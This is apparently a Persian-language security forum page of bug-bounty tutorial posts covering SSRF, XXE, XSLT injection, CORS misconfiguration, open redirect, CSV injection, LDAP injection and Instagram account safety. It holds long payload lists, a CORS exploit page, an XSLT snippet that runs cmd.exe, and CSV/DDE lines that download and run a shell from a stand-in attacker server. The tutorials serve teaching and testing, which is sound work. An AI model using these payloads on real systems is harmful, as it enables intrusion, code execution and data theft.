1314CK.0FF3NSIV3

باسلام در این بررسی شما یاد خواهید گرفت که مفهوم عملکرد Account Takeover چیست و برای چی Severity آن در سایت های باگ بانتی بالاست ؛ همانطور که از اسم آن پیداست به معنی گرفتن اکانت قربانی توسط مهاجم خود این فرآیند ملزم به تمهدیداتی است که مهاجم با توجه به آسیب پذیری کشف شده در صدد آن است که سطح دسترسی خودرا بنحوی افزایش دهد که بتواند به خواسته خودش برسد از آسیب پذیری های مثل CSRF، IDOR ، بروت فورس و.... می توان نام برد . بارها دیده شده حتی با یه Business Logic Errors هم مهاجم تونسته سطح دسترسی اکانت خود را تا حد گرفتن اکانت مدیریت بالا ببره ، پس در این پست شما با سیمایی از آسیب پذری آشنا شدید در جلسات بعدی در این حیطه شما یاد خواهید گرفت که حتی در بررسی Domain هم توجهاتی داشته باشید که به Domain Takeover مشهور هست . پس باما همراه باشید /.

یکی از تکنیک های مرسوم SSRF via URL Scheme است که بوضوح در نت هم قابل دیدن هست : Dict:// dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> ssrf.php?url=dict://attacker:11111/ Sftp:// ssrf.php?url=sftp://evil.com:11111/ Tftp:// ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET Ldap:// ssrf.php?url=ldap://localhost:11211/%0astats%0aquit ادامه دارد ...

باسلام در آسیب پذیری XXE ویا XML External Entity Injection به حمله ای اطلاق می شود که ورودی XML را در وهله اول تجزیه شود . این حمله زمانی رخ می دهد که ورودی XML حاوی وجود یک حمله خارجی توسط یک تجزیه کننده XML صورت بگیرد که بدلیل پیکربندی نامناسب داخل سرور پردازش شود. بنابراین حمله منجر به نشراطلاعات محرمانه ، حملات تکذیب سرویس ، جعل درخواست سمت سرور ، اسکن پورت و ضربات حملاتی که بعد از نیز ممکن است به همراه داشته باشد . فرض می کنیم ما یک آسیب پذیری XXE پیدا کرده ایم که محتوای زیر را در درخواست POST به برنامه ارسال می کند: <?xml version=”1.0″ encoding=”ISO-8859-1″?> <Prod> <Prod> <Type>test</type> <name>iran-cyber</name> <id>21</id> </Prod> </Prod> بررسی حمله که ببینید آسیب پذیر است یا خیر : روش 1 - شناسایی سرور آسیب پذیر با استفاده از نهاد SYSTEM: اولین قدم ببینیم آیا میتوانیم درخواستی را با ارسال یک فایل لوکال روی سرور تارگت انجام بدیم یا نه ؟! برای اینکار، با استفاده از SYSTEM استفاده می کنیم: <?xml version=”1.0″ encoding=”ISO-8859-1″?> <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM “http://YOURIP/TEST.ext” >]> <Prod> <Prod> <Type>test</type> <name>iran-cyber</name> <id>&xxe</id> </Prod> </Prod> ادامه دارد ....

باسلام در بررسی گزارش XSLT ها یا به اصلاح Extensible Stylesheet Language Transformations به نوعی فرآیند برای تبدیل اسناد XML به اسناد XML دیگر استفاده می شود یا می توان گفت برای تبدیل قالب های HTML به HTML با فرآیندی دیگر برای صفحات وب. هنگامی که محتوای XSLT در دست مهاجم قرار بگیرد می تواند، حملات مختلفی با Impact مختلف انجام دهد یکی از حملاتی که منجبر با استفاده از آسیب پذیری می شود آسیب پذیری RCE است که در بررسی یک CMS خصوصی با نام Ektron Web CMS با عدم عملکرد کنترل روی داده های XSL کاربر در داخل کلاس XslCompiledTransform این باگ ایجاد شد که نهایتا منجر به RCE برای مهاجم شد . برای شروع اگر شما CMS رو دارین آدرس زیر در مرورگر اجرا کنید : http://127.0.0.1/WorkArea/ContentDesigner/ekajaxtransform.aspx قدم بعدی enumerate کردن مقادیر در XSLT هست که ریکوسئهایی که با متد POST با Burp برای تزریق XSLT استفاده می کنیم حال پارامتری که قابلیت POST شدن دارد : xslt=<?xml version="1.0" encoding="ISO-8859-1"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <html> <body> Version: <xsl:value-of select="system-property('xsl:version')" /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </body> </html> </xsl:template> </xsl:stylesheet> گام دیگر برای Ping گرفتن دست شد : xslt=<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App"> <msxsl:script implements-prefix="App" language="C#"> <![CDATA[ { System.Diagnostics.Process.Start("cmd.exe /C ping IP"); } ]]> </msxsl:script> <xsl:template match="ArrayOfTest"> </xsl:template> </xsl:stylesheet> ادامه دارد ..... بااحترام

باسلام با توجه به پیشرفت روز افزون شبکه های اجتماعی ، اینستاگرام ازمحبوبیت ترین شبکه هایی در بین مردم است که بدلیل بی توجهی به مسائل امنیتی مشکلات امنیتی زیادی در این زمینه برای کاربران به همراه دارد بنابراین بحث امنیت کاربر الزامی است. بر این اساس ساختار برنامه اینستاگرام، تقریبا میشه گفت که هک شدن اکانت های آن ۹۹ درصد به خود دارنده اکانت بستگی دارد . حال به چند مورد ابتدایی که کاربر الزامی است آن را رعایت نماید اشاره می کنیم : انتخاب ایمیل برای اکانت و تنظیم پسورد مناسب فعالسازی Two-Factor Authentication برای اکانت خصوصی کردن (private) صفحه شخصی عدم استفاده از بدافزارهای تبلیغاتی و خدمات دهی اینستاگرام از سوی کاربران عدم ورود کاربران به صفحات فیشینگ از طریق مهندسی اجتماعی عدم کلیک روی لینک های ناشناس و....... افراد زیادی در اینستاگرام در زمینه های مختلفی فعالیت می کنند و بدون داشتن دانش خاصی برای تنظیم صحیح اینستاگرام در این شبکه ها فعالیت کرده و دارای مجوز و یا اعتبار رسمی نمی باشند و صرفا با یک صفحه و بیوگرافی معمول در اینستاگرام فعالیت می کنند ، بنابراین در این راستا بعضی از افراد کلاهبردار سعی به نشر عنوانین مثل امنیت اینستاگرام بصورت تضمینی یا جلوگیری از راه نفوذ این کاربران را به سمت خود هدایت میکنند که به گفته کلاهبردان از روش هایی باعث جلوگیری از هرگونه نفوذ در اینستاگرام می شوند که این نوعی فریب کاربران اینستاگرامی است که با افتادن در این دامد اطلاعات خود را برای تامین 100 درصدی اینستاگرامشون فریب کلاهبرداران را می خورند و در نهایت اکانت آن ها از دسترس خارج میشود . مشکلات امنیتی : شاید تا بحال شنیده باشید که کاربران در هنگام ورود به اکانت گفته می شود که اکانت من بالا نمیاد وکل زندگیم به بستگی پیج اینستاگرام داره نمونه ای ازاین افراد به عنوان مثال سلبریتی ها و یا استارت اپها که میگن دیگه کسب و کاری ندارم چطور اکانتم رو برگردونم ... و یا گفته میشه که فکر کنم اکانتم هک شده چون ایدیمو سرچ میزنم پست هام پاک شدن و در بیوم نوشته شده "این اکانت هک شده" این دسته مواردی هست که کاربران با آن روبرو می شوند بنابراین به راهنمایی هایی قبل از اینگونه پیشامدها و بعد از آن الزامی هست نکته مهم امنیت برای جلوگیری از مخاطرات حساس برای این عزیزان است ؛ که یاد بگیریم با چنین مشکلاتی برای خود و خانواده‌مان روبرو نشیم چرا که اکثر کسانی که دچار این مشکل شده اند خودشان مقصر بوده اند. شرکت ایران سایبر در نظر دارد برای عزیزانی که در این زمینه اطلاع لازم و کافی را ندارند مشاوره داده و کاربران بتوانند در محیطی امن به فعالیت و کسب وکار خود ادامه دهند.این روش ها نیاز به دانش ابتدایی برای درک مکانیزم اینستاگرام رو ندارد فقط تنظیماتی اعمال می شود که اکانت اینستاگرام کاربران برای اینگونه مشکلات محفوظ تر بماند .سخن آخر هم تایید میکنم هیچ گونه نیازی به استخدام یک فرد برای تامین امنیت اکانت نیست و فرآیند تنظیمات صحیح شرط لازم و کافی برای شما عزیزان است.

باسلام برای تست اولیه اگر با برپ سختتون هست میتونید از دستور زیر در ویندوز با curl انجام بدین و Respnse از سمت سرور رو شبیه بالا ببینید : curl https://www.target.com -H "Origin: https://www.google.com" -I لینک دانلود curl رو از آدرس زیر دریافت کنید : https://curl.haxx.se/windows بااحترام .

لیست دیگر برای شما عزیزان فقط کافیه انتهای آدرس هایی که احساس می کنید قابل ریدارکت شدن را دارند وارد کنید . چند نمونه پارامترهای آسیب پذیر رو برای روشن شدن مطلب : /{payload} ?next={payload} ?url={payload} ?target={payload} ?rurl={payload} ?dest={payload} ?destination={payload} ?redir={payload} ?redirect_uri={payload} ?redirect_url={payload} ?redirect={payload} /redirect/{payload} /cgi-bin/redirect.cgi?{payload} /out/{payload} /out?{payload} ?view={payload} /login?to={payload} ?image_url={payload} ?go={payload} ?return={payload} ?returnTo={payload} ?return_to={payload} ?checkout_url={payload} ?continue={payload} ?return_path={payload} حال کافیه پیلوت های زیر رو به پارامتر هایی چند نمونشو که در بالا اشاره میتونید اضافه کنید : ////[email protected]// ////[email protected]/ ///[email protected]// ///[email protected]/ //[email protected]// //[email protected]/ target;@google.com target.google.com ////[email protected]/%2e%2e ///[email protected]/%2e%2e ////[email protected]/%2e%2e%2f ///[email protected]/%2e%2e%2f //[email protected]/%2e%2e%2f ////[email protected]/%2f.. ///[email protected]/%2f.. //[email protected]/%2f.. ////[email protected]/%2f%2e%2e ///[email protected]/%2f%2e%2e //[email protected]/%2f%2e%2e http://target>.7d8T\205pZM@[email protected]/ http://target>.7d8T\205pZM@[email protected]/ ja\nva\tscript\r:alert(1) java%09script:alert(1) java%0ascript:alert(1) java%0d%0ascript%0d%0a:alert(0) java%0dscript:alert(1) Javas%26%2399;ript:alert(1) javascript://%0aalert(1) <>javascript:alert(1); //javascript:alert(1); //javascript:alert(1) /javascript:alert(1); /javascript:alert(1) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) javascript:alert(1); javascript:alert(1) javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) javascript:confirm(1) javascript://https://target/?z=%0Aalert(1) javascript:prompt(1) jaVAscript://target//%0d%0aalert(1);// javascript://target?%a0alert%281%29 /https://[email protected]/ https://target;@google.com https://target.google.com https://[email protected]// https://[email protected]/ https://[email protected] /https://[email protected]/%2e%2e https:///[email protected]/%2e%2e //https://[email protected]/%2e%2e%2f https://[email protected]/%2e%2e%2f /https://[email protected]/%2f.. https://[email protected]/%2f.. /https:///[email protected]/%2f%2e%2e /https://[email protected]/%2f%2e%2e https:///[email protected]/%2f%2e%2e https://[email protected]/%2f%2e%2e http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://target@0xd83ad6ce http:target@0xd83ad6ce http://target@[::10.0.0.1] http:target@[::10.0.0.1] اگر متوجه نشدین بیشتر توضیح بدم ...

باسلام طبق بررسی های اخیر کاربر های زیر وارد level دیگری از سطح رنک کاربری شده اند انجمن در حال بررسی کاربران فعال است اگر مورد دیگری مشاهده شود وارد فاز جدیدتری خواهد شد بنابراین اگر تمایل به همکاری با انجمن را دارید پس شروع کنید : Unkn0wn Reza.Black بااحترام .

باسلام در بررسی حملات Broken Authentication و Session Management مهاجم با هدف تلاش و بازیابی رمزهای عبور ، اطلاعات حساب کاربر ، شناسه ها و سایر جزئیات اقدام می کند . از رایج ترین آسیب پذیری در استاندارد OWASP به صورت OWASP Top 10 اشاره شده است که مهاجم بدون احراز هویت و عدم توانایی سرور در تغییر نشست ها راهی برای takeover کردن انجام دهد ممکن است حتی در takeover account هم سبب شد چرا که د داده های ورود کاربر را براحتی به سرقت می رود، یا مهاجم می تواند داده های شنست ها مثل کوکی ها را جعل کند وسعی در دسترسی غیرمجاز به وب سایت ها پیدا کند . راهکارهایی که مسوب این حملات می شود : عدم اعتبارنامه احراز هویت ، هنگام ذخیره شدن رمزهای ورودی بدون هش شدن ویا رمزگذاری عدم کنترل روی اسناد و اعتبارنامه ها ،مهاجم می تواند براحتی حدس بزند یا با بازنویسی در توابع مختلف در مدیریت حساب اعم از ایجاد حساب ، تغییر رمز عبور ، بازیابی رمز عبور ، شناسه نشست ضعیفو... را انجام دهد عدم تغییرسیشن ID ها و حتی عدم تایم اوت در هنگام تغییر آن عدم کنترل روی پسورد ها ، سیشن ID ها ؛ اعتبارنامه ها که بدون رمزنگاری به سمت سرور ارسال می شوند در استاندارد Owasp میبینید : A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards میتونید در آیتم سوم عنوانش را ببینید : https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2010 برای روشن شدن حمله میتونیم به این صورت اشاره کنیم شما دو پلن a و b دارید کاربر ازپلن a لاگین شده و سیشن های اون روداره حالا با پلن b وارد اکانت شده و فقط کافیه سیشن های a روبجای b قرار بده حال چه اتفاقی میوفته ؟!!بله مهاجم میتونه به پلن a دسترسی پیدا کنه و مجددا از اون استفاده کنه این نوعی takeover کردن اکانت بکار میره که در باگ بانتی از ارزش خاصی برخورداره که این تکنیک از زیر شاخه های این حملات محسوب میشه . ادامه دارد .....

باسلام به آسیب پذیری اطلاق می شود که اطلاعات حساس و مهمی را برای مهاجم در دسترس قرار بدهد زمانی رخ میدهد که یک برنامه به اندازه کافی از اطلاعات حساس در هنگام نشت برای مهاجمان محافظت نشود. به عنوان مثال : اطلاعات بانکی اطلاعات شخصی نام کاربری و پسورد اکانت در دسترس قرار گرفتن session token ها رسیدن به authentication credential ها دسترسی به دیتای مهم از طریق مسیرها برای مهاجم که این موارد از طریق هایجکت شدن ، عدم ایمن بودن تارگت و sql injection و.... رخ می دهد . که در استاندارد owasp بصورت لینک زیر اشاره کرده است : https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure نحوه مقابله در Sensitive Data Exposure : استفاده از الگوریتم های رمزگذاری و رمزگذاری در هنگام جابجایی داده ها کاهش سطح دسترسی به داده های حساس غیرفعال کردن از دسترسی ذخیره سازی داده ها در فرم ها غیرفعال کردن ذخیره در فرم ها که داده ها را جمع آوری می کنند در جلسه بعدی به چند مورد اشاره می شود ...

باسلام آسیب پذیری IDOR یا همون Insecure Direct Object Reference به آسیب پذیری گفته می شود که به مهاجمان اجازه می دهد تا منابعی که برای کاربران در دسترس نیستند اجازه دستری بدهد (دستیابی به داده های غیرمجاز) . برای مثال متغییرهای زیادی در وب سایت ها مانند "id" ، "pid" ، "uid"و... وجود دارد که این مقادیر معمولاً به عنوان پارامترهای HTTP دیده می شوند ، گاهی به عنوان POST data در هدر ها و کوکی ها می توان دید . مهاجم می تواند با تغییر مقادیر در هر پارامتر به هر یک از آبجکت های که به کاربران تخصیص یافته دسترسی پیدا کند مثل ویرایش یا حذف و.. که به این آسیب پذیری IDOR گفته می شود. برای فهمیدن این موضوع مهاجم در وهله اول باید نگرش توسعه دهنده ویا طراح را درک کند به عنوان مثال هنگام ورود کاربر به نسخه تحت وب ، تلفن همراه و.. از چه ماژولی ، پلاگینی و.... استفاده کرده است یا عملکردهای ورودی به چه صورت است.این فرایند با تست خودکار توسط ابزار ها بدست نمیاد بلکه از روی تجربه و عملکرد تست دستی است نوعی آزمون و خطا برای شناسایی این آسیب پذیری هاست . در استاندارد Owasp میتوانید ببینید OWASP Top 10 - 2013 (Previous Version) ) : A1-Injection - A2-Broken Authentication and Session Management - A3-Cross-Site Scripting (XSS) - A4-Insecure Direct Object References - [Merged + A7] - A5-Security Misconfiguration - A6-Sensitive Data Exposure - A7-Missing Function Level Access Control - [Merged + A4] - A8-Cross-Site Request Forgery (CSRF) [Dropped] - A9-Using Components with Known Vulnerabilities - - A10-Unvalidated Redirects and Forwards [Dropped] یا برای شفاف سازی بیشتر از مقاله زیر می تونید کمک بگیرید : https://www.owasp.org/images/4/4a/IDOR.pdf ادامه دارد ....

باسلام این آسیب پذیری اساساً بدلیل عدم پیکربندی مناسب CORS ایجاد می شود که در آن با null origin بودن به مهاجم اجازه credentials بصورت true را میدهد برای درک بیشنر مسئله در هر تارگت به هدر اون رجوع کرده و در هنگام بررسی پاسخ از سمت سرور آن نیز چک می کنیم که عملکرد این آسیب پذیری به چه صورت است . در Capture این مثال در هدر آن میبینیم : GET /api/ HTTP/1.1 Host: iran-cyber.net User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Origin: iran-cyber.net Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 میبیند که مقداری به Origin تخصیص پیدا کرده که همان آدرس است که اگر در پاسخ از سمت سرور رو بصورت Response نیز بررسی کنیم میبینیم که : HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 127168 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block;'; Access-Control-Allow-Origin: iran-cyber.net Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, POST Strict-Transport-Security: max-age=31536000 Expires: Sat, 02 02 2020 12:29:00 GMT Pragma: no-cache Date: Sat, 02 02 2020 12:29:00 GMT Connection: close Set-Cookie: LEL_JS=true; expires=Sat, 02-02-202012:59:00 GMT; Max-Age=1800 Cache-Control: max-age=0, no-cache, no-store, no-transform Vary: Accept-Encoding, User-Agent Strict-Transport-Security: max-age=31536000 Set-Cookie: bm_sv=EDBA03CA40AC8D77509922CAA98130B4~OXaAg7LsgySzeWnqd9TzoaW6pGtPv7Ut2dYfUp7otuPnD1uJi3BUwSCYQiDP4q92NaiK6GLXT8xxPmWSgspcRyYjatr3Zc5lDyt8+MMSsDnq267a1bOhniBmABAbrga8gmdQdjDNE5GsLvrlCcm07Q3hffJKqLj7hIkMIJhtw4g=; Domain=.iran-cyber.net; Path=/; Max-Age=1053; HttpOnly که در Access-Control-Allow-Origin به ما آدرس رو مجددا داد : Access-Control-Allow-Origin: iran-cyber.net Access-Control-Allow-Credentials: true پس میشه سناریو این آسیب پذیری رو اکسپلویت کرد که بصورت زیر است : <html> <body> <center> <h2>IRAN Cyber</h2> <div id="demo"> <button type="button" onclick="cors()">Run Exploit</button> </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhttp.open("GET", "https://target.com/", true); xhttp.withCredentials = true; xhttp.send(); } </script> </body> </html> که اگر رو localhost به اون سایت هایی که آسیب پذیر هستند در اکسپلویت وارد کرده و اجرا کنین و خروجی آن بصورت زیر میبینید : این آسیب پذیری حتی گاهاً تا TakeOver Account نیز پیش می رود در ادامه بیشتر توضیح داده می شود ....

باسلام طبق تصمیم جدید تیم امنیتی ایران سایبر در نظر دارد برای بخش های مختلف انجمن مدیرانی لایق و توانمند جذب کند که سطح کیفی انجمن افزایش پیدا کرده و شرایط جدیدتری برای انجمن ایفا کنیم در این راستا عزیزان می توانند فعالیت مناسب داشته و بعد از بررسی در روزهای آتی دسترسی بخش به این عزیزان اهدا می شود لازم بذکر است کاربرانی که در رنک های پایینی قراردارند در هررنک نیاز به پیموندن level رنک هست و اگر توانایی شخص برای مدیریت بخش لازم و کافی باشد دسترسی لازمه به آن اهدا می شود . بااحترام

باسلام از آسیب پذیری ها آسیب پذیری Open Redirect که مهاجم با متد های خلاقانه تر برای تست استفاده کند در هر پست به چند مورد خاص اشاره می کنم که با این نوع Open Redirect ها هم برای تست آشنایی لازم را پیدا کنید که در Impact گزارش به ریدارکت شدن قربانی به malicious page ها یا صفحات فیشینگ می توان اشاره کرد. چند نمونه Open Redirect : ////%09/google.com ///%09/google.com //%09/google.com /%09/google.com /%09/javascript:alert(1); /%09/javascript:alert(1) http://;@google.com http://.google.com http://google.com http:/\/\google.com http:/google.com http:google.com http://google.com%23.whitelisted.com/ http://google.com%2f%2f.whitelisted.com/ http://google.com%3F.whitelisted.com/ http://google.com%5c%5c.whitelisted.com/ http://google.com:[email protected]/ http://google.com:80#@whitelisted.com/ http://google.com\twhitelisted.com/ /https://%09/google.com https://%09/google.com //https://[email protected]// /https://[email protected]/ https://whitelisted.com;@google.com https://whitelisted.com.google.com https://[email protected]// https://[email protected]/ https://[email protected] /https://[email protected]/%2e%2e https:///[email protected]/%2e%2e //https://[email protected]/%2e%2e%2f https://[email protected]/%2e%2e%2f /https://[email protected]/%2f.. https://[email protected]/%2f.. /https:///[email protected]/%2f%2e%2e /https://[email protected]/%2f%2e%2e https:///[email protected]/%2f%2e%2e https://[email protected]/%2f%2e%2e /https://[email protected]/%2f.//[email protected]/%2f.. https://whitelisted.com/https://google.com/ @https://www.google.com http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] http:[email protected] http://[email protected] /https://%5cgoogle.com /https:google.com https://////google.com https://google.com// https://google.com/ https://google.com https:/\google.com https:google.com //https:///google.com/%2e%2e /https://google.com/%2e%2e https:///google.com/%2e%2e //https://google.com/%2e%2e%2f https://google.com/%2e%2e%2f /https://google.com/%2f.. https://google.com/%2f.. /https:///google.com/%2f%2e%2e /https://google.com/%2f%2e%2e https:///google.com/%2f%2e%2e https://google.com/%2f%2e%2e https://:@google.com\@whitelisted.com https://google.com?whitelisted.com https://google.com/whitelisted.com https://google.com\whitelisted.com https://google.com#whitelisted.com https://google%E3%80%82com /https:/%5cgoogle.com/ https://%5cgoogle.com https:/%5cgoogle.com/ /https://%[email protected] https://%[email protected] https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77 //https://google.com// /https://google.com// /https://google.com/ /https://google.com /https:google.com https://////google.com https://google.com// تاپیک در جلسات بعدی تکمیل تر می شود .

با سلام یکی از گزارشات ارسالی در باگ بانتی آسیب پذیری SSRF می باشد که براساس توضیحات استاندارد owasp مهاجم می تواند از قابلیت های موجود در سرور سوء استفاده کرده و یا منابع داخلی مرتبط به سرور را براحتی بخواند و یا به روز کند . کاربری حمله از طریق SSRF می توان بصورت زیر اشاره کرد : مهاجم می تواند URL ای را ایجاد یا تغییر دهد که بتواند توسط اکسپلویت داده های در حال اجرا روی سرور را بخواند (بصورت file://) یا به سمت سرور ارسال کند مهاجم می تواند با انتخاب دقیق URLها نیز پیکربندی سرور مثل متادیتاهای AWS را نیز بخواند به عنوان مثال در داده های سرور Cloud که سرویس آن AWS را داراست. مهاجم می تواند به سرویس های داخلی متصل شده و پایگاه داده را فعال کند یا Request های خود را به سمت سرویس های داخلی که قرار نیست در معرض دید قرار بگیرند انجام دهد. لیستی از پیلوت های اون رو برای شما عزیزان قرار میدهم : Payloads with localhost Basic SSRF v1 http://127.0.0.1:80 http://127.0.0.1:443 http://127.0.0.1:22 http://0.0.0.0:80 http://0.0.0.0:443 http://0.0.0.0:22 Basic SSRF - Alternative version http://localhost:80 http://localhost:443 http://localhost:22 Advanced exploit using a redirection 1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com 2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 Advanced exploit using type=url Change "type=file" to "type=url" Paste URL in text field and hit enter Using this vulnerability users can upload images from any image URL = trigger an SSRF Bypassing filters Bypass using HTTPS https://127.0.0.1/ https://localhost/ Bypass localhost with [::] http://[::]:80/ http://[::]:25/ SMTP http://[::]:22/ SSH http://[::]:3128/ Squid http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/ Squid Bypass localhost with a domain redirection http://spoofed.burpcollaborator.net http://localtest.me http://customer1.app.localhost.my.company.127.0.0.1.nip.io http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost http://bugbounty.dod.network redirect to 127.0.0.2 == localhost The service nip.io is awesome for that, it will convert any ip address as a dns. NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1 Bypass localhost with CIDR It's a /8 http://127.127.127.127 http://127.0.1.3 http://127.0.0.0 Bypass using a decimal IP location http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 Bypass using IPv6/IPv4 Address Embedding IPv6/IPv4 Address Embedding http://[0:0:0:0:0:ffff:127.0.0.1] Bypass using malformed urls localhost:+11211aaa localhost:00011211aaaa Bypass using rare address You can short-hand IP addresses by dropping the zeros http://0/ http://127.1 http://127.0.1 Bypass using bash variables (curl only) curl -v "http://evil$google.com" $google = "" Bypass using tricks combination http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 : 1.1.1.1 requests + browsers : 2.2.2.2 urllib : 3.3.3.3 Bypass using enclosed alphanumerics @EdOverflow http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com Bypass filter_var() php function 0://evil.com:80;http://google.com:80/ مثالی برای روشن شدن این آسیب پذیری : در یک بررسی کلی بروی یک تارگن مهاجم پس از آزمایش چندین تکنیک SSRF ، به یک روش دور زدن برای protection ها رسیده که از وکتور IPV6 بصورت [::] استفاده کند . حال برای مدلسازی این طرح فایل x.php که بصورت زیر است : <?php header("location: ".$_GET['u']); ?> را با بهره گیری از [::] برای ssrf خود بصورت زیر اجرا کرده : http://127.0.0.1/x.php/?u=http://%5B::%5D:22/ که بعد از اجرا خروجی پاسخ را از سمت سرور بصورت زیر می بیند : "body": { SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 Protocol mismatch. }

با سلام در گزارشات ارسالی برای باگ بانتی یکی از آسیب پذیری هایی که از اون کاربران جوایز دریافت می کنند آسیب پذیری CSV Injection است که از اهمیت خاصی برخوردار بوده ، بنابراین توضیحات لازمه اولیه را برای شما عزیزان ارائه خواهیم داد . برخی از سرویس به کاربران این امکان را می دهند تا داده های تا فایل های خود را بصورت CSV آپلود کنند حال اگر به طور نادرست انجام شود این قابلیت می توان سبب ایجاد آسیب پذیری تزریق CSV شود که در ادامه به اون می پردازیم . برخی این آسیب پذیری را با Seveity کم و برخی آن را به عنوان یک آسیب پذیری Critical طبقه بندی می کنند.حال پسوندی است که ادمین سرور برای آپلودمی تواند به کاربران اجازه آپلوده فایل CSV را بدهد بنابراین در بیشتر bug-bouny آن را خارج از محدوده Policy در نظر می گیرند. با این حال ، این متد هنوز یک آسیب پذیری واقعا حساس است که بسیاری از مردم از وجود آن اطلاعی ندارند بیشتر کاربران با اکسل آشنایت دارند می دانند که اکسل می تواند از فرمول استفاده کند. به عنوان مثال فرمول زیر دو عدد باهم جمع می شود : =5+4 همانطور که می بینید فرمول "= 4 + 5" عدد 9 را نشان می دهد. بنابراین از فرمول ها می توان برای انجام انواع کارها استفاده کرد پس در تست آسیبپذیری جهت اجرای ورودی برنامه ها استفاده کرد. فرض کنید یک سرویس به سرورها اجازه می دهد به کاربران اجازه آپلوده فایل CSV را بدهد . برای تست CSV Injection می توانیم فایلی را با فرمول نویسی اکسل به عنوان مقدار به سمت سرور بفرستیم . اگر فرمول در هر sheet جاسازی شود ، آسیب پذیری داریم. چند نمونه پیلوت براتون قرار میدهم : # pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 =2+5+cmd|' /C calc'!A0 # pop a notepad =cmd|' /C notepad'!'A1' # powershell download and execute =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 # msf smb delivery with rundll32 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 میبینید که هر پیلوت به DDE یعنی Dynamic Data Exchange مشهور هستند که می تواند بعدها درجهت تکامل آسیب پذیری های پیشرفته تری استفاده شوند در تاپیک بعدی نحوه بهره برداری آن را توضیح میدهیم ....

با سلام در این تاپیک به تحلیل و بررسی آسیب پذیری LDAP اشاره کرده وچگونگی بهره برداری مهاجم از این آسیب پذیری شرح داده می شود . براساس استاندارد Owasp گفتنی است که LDAP Injection حمله ای است که با اکسپلویت آن برای سرویس های مبتنی بر وب می توان استفاده کرد که آسیب پذیریLDAP که با تزریق از طریق ورودی کاربر ایجاد شود . هنگامی که یک برنامه نتواند به درستی از Query ورودی کاربر استفاده کند ، می توان اظهارداشت که LDAP را می توان با استفاده از یک پراکسی عملی ساخت. این آسیبپذیری می تواند منجر به اجرای دستورات دلخواه مانند اجازه دسترسی مجاز به درخواستهای غیرمجاز و اصلاح آبجکت های ساختارهای درختی LDAP نیز شود. بنابراین در این آسیب پذیری می توان از تکنیک های پیشرفته ای که در SQL Injection استفاده می شود به طور مشابه در LDAP Injection نیز استفاده کرد. با اکسپلویت آسیب پذیری LDAP Injection به مهاجم شرایط زیر را می دهد: دسترسی به محتویات غیرمجاز سو استفاده از محدودیت های سرویس ها جمع آوری اطلاعات غیرمجاز اضافه و یا اصلاح آبجکت های موجود در ساختار درختی LDAP نحوه عملکرد تست نفوذ آسیب پذیری LDAP Injection: در آسیب پذیری LDAP تزریق معمولاً در فیلترهای جستجو یا در هنگام لاگین به سیستم رخ می دهد.برای مثال در فیلترهای جستجو بصورت ذیل عمل می کنیم : فرض کنید دربررسی وب سایت که از فیلد جستجو استفاده میکند از Query زیر بهره میگیریم ، بنابراین در فیلتر سرچ بصورت زیر است : searchfilter=”(cn=”+user+”)” در ارسال درخواست ها توسط http می توان بصورت زیر آدرس را مشاهده کرد : http://127.0.0.1/search?user=irancyber حال ما در خواست رو بجای یوزر عنوان شده ستاره قرار میدهیم : http://127.0.0.1/ldapsearch?user=* که در فیلتر سرچ بصورت زیر است : searchfilter=”(cn=*)” که بدین معناست هر آبجکتی با ویژگی "cn" 